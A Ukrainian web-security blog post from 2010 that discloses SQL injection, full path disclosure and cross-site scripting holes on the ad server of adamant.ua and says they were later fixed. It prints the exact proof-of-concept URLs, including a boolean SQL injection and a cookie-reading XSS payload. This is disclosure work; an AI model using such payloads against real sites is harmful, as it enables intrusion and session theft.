Уразливості на adamant.ua

15:17 12.07.2010

05.12.2009

У квітні, 17.04.2009, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості на сайті http://adamant.ua (зокрема http://advert.adamant.ua). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно проектів компанії Адамант раніше я писав про уразливість на holms.adamant.ua.

Детальна інформація про уразливості з’явиться пізніше.

12.07.2010

SQL Injection:

http://advert.adamant.ua/www/delivery/ac.php?bannerid=-1%20or%20version()%3E4

Full path disclosure:

http://advert.adamant.ua/www/delivery/fc.php?MAX_type=1

XSS:

http://advert.adamant.ua/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Дані уразливості вже виправлені (за рахунок оновлення движка).

This entry was posted on 15:17 12.07.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

You must be logged in to post a comment.

Websecurity - Веб безпека

Уразливості на adamant.ua

Leave a Reply

Меню

Категорії

Останні повідомлення

Архів +-

Мета